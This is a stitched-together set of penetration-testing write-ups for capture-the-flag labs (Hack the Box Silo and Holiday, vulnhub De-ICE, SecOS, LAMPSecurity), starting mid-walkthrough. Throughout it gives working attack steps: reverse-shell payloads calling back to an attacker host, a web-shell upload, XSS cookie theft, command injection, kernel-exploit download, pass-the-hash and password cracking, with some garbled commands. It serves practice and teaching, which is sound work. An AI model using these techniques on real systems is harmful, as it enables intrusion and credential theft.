The final dot:

“Pseudocode will be implemented with the root account and my account.”

My account seems like sysadmin talking.

Let us compile this Java code using javac.

javac program.java

Execute this using :

java program

As stated, we input sysadmin as the username and it gave us a password. It gave a password for root as well but it didn’t work.

ssh sysadmin@192.168.1.20

Generated password: 7531/{{tor/rv/A

Hence, we got into the sysadmin shell!

We tried su here and it prompted for password.

Upon entering the system generated password, we got into root!!

Final steps:

cat Note_to_self

Hence, the flag was nabbed! Hope you enjoyed this!

Hello friends!! Today we are going to solve another CTF challenge “Silo” which is available online for those who want to increase their skill in penetration testing and black box testing. Silo is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Steps involved:

11. Post scanning to discover open ports

22. SID brute force

33. Credential brute force

44. Create payload

55. Setup listener

66. Upload shell with odat.py

77. Getting meterpreter shell

88. Finding user.txt

99. Downloading zip file from dropbox

110. Finding password hashes in memory dump

111. Privilege escalation using pass the hash technique

112. Finding root.txt

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.82 so let’s begin with nmap port enumeration.

nmap-sV-p-10.10.10.82

From given below image, you can observe we find only port 80, 135, 139, 445, 1521, 49152-49161 is open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find that it contains the default IIS page.

We have oracle database listening remotely on port 1521, we need to find the valid SID and credentials in order to connect to the database.

We first need to get the SID for the oracle service, so we use metasploit to brute force the valid SID.

msf > use auxiliary/admin/oracle/sid_brute

msf auxiliary(admin/oracle/sid_brute) > set rhost 10.10.10.82

msf auxiliary(admin/oracle/sid_brute) > run

After finding the SID, we brute force the valid credentials using metasploit.

msf > use auxiliary/admin/oracle/oracle_login

msf auxiliary(admin/oracle/oracle_login) > set sid XE

msf auxiliary(admin/oracle/oracle_login) > set rhost 10.10.10.82

msf auxiliary(admin/oracle/oracle_login) > run

We are unable to get a shell with reverse_tcp, so we use reverse_https payload. We create a 64-bit payload as the nmap scan shows us that the Operating system is 64-bit windows server.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.8 lport=443 -f aspx > /tmp/Shell.aspx

We setup our listener before upload the payload to the target machine.

msf > use multi/handler

msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https

msf exploit(multi/handler) > set lhost 10.10.14.8

msf exploit(multi/handler) > set lport 443

msf exploit(multi/handler) > run

We use this script called odat to further exploit the oracle database(you can download the script here). As we have the valid credentials and the valid SID we use this to login into the database and upload our asp shell in IIS default directory.

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile “C:\inetpub\wwwroot\\” shell.aspx /tmp/Shell.aspx --sysdba

As soon as we run the shell on the target machine, we get a reverse shell.

Enumerating through the directories we find two files in “C:\Users\Phineas\Desktop” called “user.txt” and “Oracle issue.txt”. We take a look at the content of user.txt and find our first flag.

We take a look at the content of “Oracle issue.txt” and find a link to a dropbox and a password in which the first char is not being rendered by kali linux.

We find the unrecognized character to be the pound symbol (£). We use the password to login and find a zip file, we download the file into our system.

After downloading the zip file, we unzip it and find that it contains a memory dump. We use volatility tool to investigate the dump.

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

We now can dump the hashes by supplying the need address which is SYSTEM and SAM.

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000

As we have the password hash for “Administrator” we use Pass the Hash technique to get a privileged shell.

msf > use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > set smbuser Administrator

msf exploit(windows/smb/psexec) > set smbpass

msf exploit(windows/smb/psexec) > set set rhost 10.10.10.82

msf exploit(windows/smb/psexec) > run

After getting a privileged shell, inside “C:\Users\Administrator\Desktop” we find a file called root.txt. We open root.txt and find the final flag.

Hello friends!! Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing and black box testing. Holiday is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.25 so let’s begin with nmap port enumeration.

nmap -A -p- 10.10.10.25 –open

From given below image, you can observe we found port 22 and 8000 are open on target system.

As port 8000 is running http we open the IP address in the browser, and find a webpage.

We don’t find anything on the webpage so we use dirb to enumerate the directories.

dirb http://192.168.102:8000

Dirb scan gives us a link to a directory called /login, we open the link and find a login page.

We capture the login request using burpsuite. We use random credentials as placeholder.

We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.

sqlmap -r sql.txt –dbms=SQLite -T users --columns –dump --batch

We use hashkiller.co.uk to decrypt the hash and find the password to the user.

We login using these credentials and we are redirected to a page with that looks like it contains user information.

We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.

We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.

We post the note to bypass the filter we have to use this payload:

We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.

nc -lvp 80

After waiting for 1 minute we received the admin cookie.

The cookie is url encoded we decode and use it hijack the administrator session.

We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.

As soon as we forward the request, we are able to successfully hijack the administrator session.

We now go to /admin directory and find a page where there are options to export bookings and notes.

We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.

We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 –f elf > shell

After creating a shell we create a python http server to upload into the target machine.

Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we can bypass the filter.

We upload the shell using wget command into the target machine and save it in /tmp directory.

As soon as we run the command we get a prompt that shell is uploaded.

We give our payload read, write and execute permission using command injection.

Now we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.8

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

We run the shell using command injection vulnerability on the target machine.

As soon as we run the shell we get a reverse shell.

We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.

python -c “import pty; pty.spawn(‘/bin/bash’)”

sudo -l

Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.

Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json

ln -s /root/root.txt package.json

We run /usr/bin/npm i * as root user and find the final flag.

After searching through google we find a way to get reverse shell using a package called rimrafall.

We setup rimrafall by following the instructions given on the webpage.

We setup the json file and change the preinstalled script to bash one liner.

We run the command as root user to get privileged shell.

sudo npm i rimrafall --unsafe

We setup the listener as soon as we run the preinstalled shell is getting executed we get a reverse shell.

nc –nvlp 1234

We go to /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.

Hello friends!! Today we are going to solve De-ICE: S1.140 CTF challenge presented by vulnhub for penetration practice. This lab is proposal for OSCP practice and mode of difficulty level is medium. You can download it from this Link: https://www.vulnhub.com/entry/de-ice-s1140,57/

Penetrating Methodlogies:

§ Network Scaning (Nmap)

§ HTTP Directory brute-force (Dirb)

§ Obtain Auth log

§ HTTPS Directory brute-force (Dirb)

§ Login in phpmyadmin

§ Steal database credential

§ FTP login to get tar file

§ SSH login to get backup.sh

§ Extracting tar file to get shadow file

§ Crack hashes (John the ripper)

§ Sudo privilege escaltion

§ Get secret.jpg

Let’s Begin!!

You will get target VM machine IP at the time of boot-up so let’s start with nmap port enumeration and execute following command in our terminal.

nmap -sV 192.168.1.110

Since port 80 was opened; so I explored target IP in the web browser and where we need to mark the lines to get the hint. Then at last you will following text shown as in the below image.

Even after reading above hint, I didn’t get any remarkable clue for further step therefore I use dirb for directory brute-force attack on HTTP.

dirb http://192.168.1.110

From its result I found so many web directories but /forum and its relative directories looks more interesting to me.

Then we navigate to /forumand observe following web page.

Further we explored /forum/index.php and notice the following web page which was an auth log for ssh login Looking at the log again, I noticed that there was only one successful login, which was from user mbrown. So I copied this log into a text file and named as file.txt

Then with help of following command we try to grep all invalid user entry who tried to login and opened session for ssh.

cat file.txt | grep “Invalid user” | awk ‘{print $8}’

cat file.txt | grep “open”

One of the user names we have grabbed in the file.txt was !DFiuoTkbxtdk0! appeared to be the password for mbrown .

I tried to login into the forum as mbrown with the password I found above, and get successfully logged in and found mbrown’s email address on his profile page as shown:

After that I run dirb on port 443 and notice some exclusive directories such /webmail and /phpmyadmin is also available.

When I explored https://192.168.1.110/webmail, I got sqirrelmail login page where I submit MBrown credential for login.

Name: mb@lazyadmin.corp

Password: !DFiuoTkbxtdk0!

In his mailbox I found mysql login information:

username: root

Password: S4!y.dk)j/_d1pKtX1

As we have enumerated that /phpmyadmin is also available so I explore it and submit above found mysql login information.

I successfully logged into database and with little more efforts I found all username and their encrypted password which I copied for decryption.

With help of online MD-5 decryption we got 2 hash values.

So now we have following credential

Rhedley: tum-ti-tum

Swillard: Austin-Willard

Now let’s try to connect with FTP with the following:

ftp 192.168.1.110

I was able to view the contents of the incoming directory which have a file backup_webhost_130111.tar.gz.enc that I downloaded with help of get command.

get backup_webhost_130111.tar.gz.enc

Then I explore more and found .ssh directory where I get ssh key “downloadkey” for user MBrown. I downloaded this also.

get downloadkey

Now let’s try to login into ssh with help of key enumerated above.

ssh -i downloadkey mbrown192.168.1.110

Bravo!! Successfully spawned victim’s machine, then I switch to user: rhedley where I found a script backup.sh which holds the command and password used to encrypt the backup_webhost_130111.tar.gz.encI downloaded earlier.

su rhedley

cd /opt

cat backup.sh

And found encryption is aes-256-cbcand password 8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1

Now let’s try to decrypt backup_webhost_130111.tar.gz.encwith help of below command:

openssl aes-256-cbc -d -md md5 -in backup_webhost_130111.tar.gz.enc -out file.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

tar -xvf file.tar.gz

Great!! It was a compress file of /etc directory and after extracting this tar file we have owned all valuable files of /etc directory of victim’s machine.

This gave me shadow file and I try to open it with help of cat command.

cd etc

cat shadow

And as you can see, I found hashes of three users, let’s try to crack it. Here I have saved all three entries into a text file and named it cracked.

Then used the following command to crack the hashes of shadow file but fail to crack the hashes for third user: sraines

unshadow passwd shadow > cracked

Then used darkcode.txt wordlist for password cracking and it took so much time to get the password for sraines who is renamed as swillard.

john cracked --wordlist=/root/darkcode.txt

So we got following credential:

User: sraines

Password:brillantissimo

So when I try to login with swillard: brillantissimo (password of sraines), it worked and I successfully login as swillard. Then I check sudo right and found this user has ALL privilege, which means he has root privilege.

su swillard

sudo -l

sudo su

cd /root

Inside /root directory I found an image secret.jpg which I move into web directory.

mv secret.jpg /var/www/forum/templates_c/secret.jpg

So when I explored above path I got the image of a Birthday Cake!! J

Hello readers and welcome to another CTF challenge. It is developed by PaulWebSec. The aim of this lab is to get the root on the VM and read the congratulatory message. The virtual machine can be downloaded here. I quickly loaded up the machine and it was primed and ready!

Steps involved:

§ IP discovery and port scanning

§ Running the web app

§ Running a CSRF attack on administrator

§ Tricking admin to visit a fake page by sending him a message

§ Waiting a few minutes to let admin visit that page

§ Getting credentials and logging in SSH using these

§ Running overlayfs on the system

§ Getting root access!

So, let’s start.

I need not say this after so many articles but the first and foremost step is running netdiscover to find the IP address of the VM.

The IP address in my case was 192.168.1.128

I run an aggressive nmap scan on this IP address to find which ports were open and the first clue to start the attack on.

We found a web app working on port 8081. Without any delay we opened it.

First hint was the message shown—“Secure Web App is a part of the vulnerable VM called secOS-2”

Hence, we inferred that this VM has web based vulnerabilities. Next step was to run a nikto scan which didn’t yield much info either.

So, we ran dirb in hope that we find something good here.

Of course there is a login page! And a login page in a web vulnerable app means a route to shell!

We moved forward to the login page directly.

Although, on inspecting the page, there were no satisfactory results but there was still a register user page available to us. We headed over there.

So we created a new user with the help of the register form. You can keep any name you want but sooner or later you’ll find, like we did, it isn’t of much use. More on that later.

Since, we got redirected to the home page, it was fair to assume we got registered. Let’s try and login into the web app using that user.

There wasn’t much of information on the page except for the fact we saw a “My Messages” tab on homepage.

Although, it is worthy to note that Burp Spider showed us a page called “hint” and upon inspecting that page we found the following details:

First: The admin visits the site very frequently.

Second: He runs it locally on 127.0.0.1

Third: CSRF is applicable!

After some going around, we found under “users” tab that Spiderman was administrator. Could it be possible that we prompt the admin to change its password to our custom pass?

Hence, we wrote a quick HTML CSRF in a text file and saved as csrf.html inside /var/www/html.

What this does is that it will prompt the administrator user to change its password to “passw0rd”

We saved the page to /var/www/html directory, started apache, ran the HTML code and waited for 2-3 minutes and we got logged into administrator account!

We found 2 messages from pirate user. One had a password for unidentified service. Could it be possible that this is a password for SSH?

We tried it out!

ssh spiderman@192.168.1.136

It worked!!

Next up, we looked for the Kernel version of the machine.

uname -a

After a couple of minutes of searching for exploits for the given kernel version we found something worth to our cause.

It is exploitable with an exploit called “overlayfs.”

We downloaded it and ran it.

cd /tmp

wget https://www.exploit-db.com/download/37292.c

gcc –o exploit 37292.c

After it got compiled using gcc, we ran it using:

./exploit

whoami

Voila! It gave us root shell.

cd /root

cat flag.txt

And just like that, it was over. Hope you enjoyed.

Welcome to another boot2root CTF challenge “LAMPSecurity: CTF8” uploaded by Creosote on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from: https://www.vulnhub.com/entry/lampsecurity-ctf8,87/

By author, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.

Level: Beginner

Penetrating Methodologies:

§ Network scanning (Nmap)

§ Surfing HTTP web services

§ Web vulnerability analysis (Nikto)

§ Directory bruteforcing (Dirb)

§ Burpsuite to capture and modify request

§ Crack the password hashes (John - The Ripper)

§ SSH brute-force (Medusa)

§ Search and Capture the flag at various stages

Let’s start

First and foremost we’ll scan the IP address with nmap. In my case, the IP address was 192.168.1.112

nmap –A 192.168.1.112

As we can see that port 80 is open, we will scan it with nikto to check for web vulnerabilities

nikto -h 192.168.1.112

Here from its result, we came to know that it is vulnerable to XSS and found phpinfo.php page is also available.

Since port 80 was opened; so I explored target IP in the web browser and welcomed by following web page as shown below.

While checking its view-source page, here I found the first flag.

1^stflag: - #flag#550e1bafe077ff0b0b67f4e32f29d751

In our nikto result, we find out that phpinfo.php was available, check it as it contains various information about the php build and version on the target system, here we will find another flag

2^ndflag: #flag#550e1bafe077ff0b0b67f4e32f29d751

Next at the home page, we will read the articles posted on the home page, when you will read full article, you will find a new directory named “content” in the url.

As we haven’t seen this directory in the nikto result, we will brute-force this directory using dirb for more details about pages inside it.

dirb http://192.168.1.112/content

In the previous result, we found a page inside content directory named hidden, browse it and you’ll find another flag inside it.

3^rdflag: #flag#57dbe55b42b307fb4115146d239955d0

Let us create a new user to access user page

Let us post a small script to print hello on page in the comment section of the article to check for cross-site scripting vulnerability

After posting the comment, browse the page to check if our script works and the alert proves that the cross-site scripting works

Now let’s edit our script to get the session id of anyone who visits the page. Basically we want to capture the session_id of Barbara who is the author of this article. To get the session id, we will force it to send a request to a url which consists of our ip-address and its cookie value, so that when anyone will visit this page, it will look for a page with the name at our server and will list out the whole url as an unreachable url. The script for that looks something like this

After saving it, we now will send link of this page to the author through the contact page in her profile

Right after sending this link, start python server in your kali, after some time you will see that some error messages are starting to pop-up in the log, from these messages, you will find out the session id of Barbara. To start the python server, the command goes like this:

Now go to home page and refresh the page to intercept its request in Burpsuite, and then replace the existing session id with the one captured in previous step and then forward it to log in as Barbara

After checking about the permissions of Barbara, we came to know that she can publish a page, so we will create a php page to extract data from table users and dump all the usernames and passwords. The code for the following will be something like this

$result = db query(‘ select name, pass from users’);

while($record = db_fetch_object($result))

{ print $record->name . “:” . $record-> pass . “
”; }

After saving when you’ll browse the page, you will find that it has dumped the usernames and passwords on the page, save these credentials in a file

Use John - The Ripper to decode the values of password hashes

john -w=/usr/share/wordlists/rockyou.txt -form=raw-md5 /root/Desktop/users.txt

After getting the usernames and passwords, we will try to brute-force ssh on the target device to check for the correct credentials, for this we will use medusa but none of the credentials will be successful.

medusa -h 192.168.1.112 -U /root/Desktop/user_list.txt -P /root/Desktop/pass.txt -M ssh

Let’s go back to basics, we know that each mail user has a display name which different from his actual username, but his username is always used in his mail id, so we will go to each users profile and copy its username from his mailing address and make a new users list.

For example: Steve Pinkton profile name is spinkon

Let’s try to brute force again, this time we will be successful as the three of the usernames will be having the password in our password list we made from the decrypted passwords

Now let’s login to target device using first credentials, here we found another flag along with the banner displayed, when you log in, you will find another flag, then list out all the files and directories, here you’ll find a file named flag, check its contents to discover one more flag.

4^rdflag: #flag#5e937c51b852e1ee90d42ddb5ccb8997

cat flag.txt

5^thflag: #flag#0ab251c07822d26b07b88136739ae39b

Here we try to escalate privilege using sudo su command but it gives an error that jharraway is not in the sudoers list

Close the current connection and login to target device using second user: bdio’s credential, then list out all the files and directories, here you’ll find a file named flag, check its contents to discover one flag.

Here we try to escalate privilege using sudo su command but it gives an error that bdio is not in the sudoers list

Again close the connection and connect using third credentials, use ls command to list files, here also you’ll find a file named flag, check its content to get one more flag, let’s try to escalate privilege using sudo su command and BANG, you are now logged in as root. List all files using ls to discover another file named flag.txt but it holds same value as 5^thflag, check its content to discover another flag.

ssh spinkton@192.168.1.112

cat flag.txt

sudo su

cat flag .txt

6^thflag: #flag#fd38e201f27e98e13abcf62890c43303

Also you will also find one flag in /etc/passwd, to check it use

cat /etc/passwd

7^thflag: #flag#5b650c18929383074fea8870d857dd2e

Wow!! we finished this challenge by grabbing all hidden flags.

Hack the pWnOS-1.0 (Boot To Root)

Hack the pWnOS: 2.0 (CTF Challenge)

OverTheWire – Bandit Walkthrough (14-21)

Hack the Jarbas: 1 (CTF Challenge)

Hack the Box: Aragog Walkthrough

Understanding NMAP packet trace

Hack the Box: Valentine Walkthrough

Hack the Tr0ll 2 (CTF challenge)

Hack the 21LTR: Scene 1 VM (Boot to Root)

Hack the Box: Bart Walkthrough

Hack the Holynix: v1 (Boot 2 Root Challenge)

Overthewire – Bandit Walkthrough (22-26)

Hack the Bulldog:2 (CTF Challenge)

Hack the Lampião: 1 (CTF Challenge)

Hack the De-Ice S1.130 (CTF Challenge)

Hack the Box: Silo Walkthrough

Hack the Box: Holiday Walkthrough

Hack the De-ICE: S1.140 (Boot to Root)

Hack the SecOS:1 (CTF Challenge)

Hack the LAMPSecurity (CTF Challenge)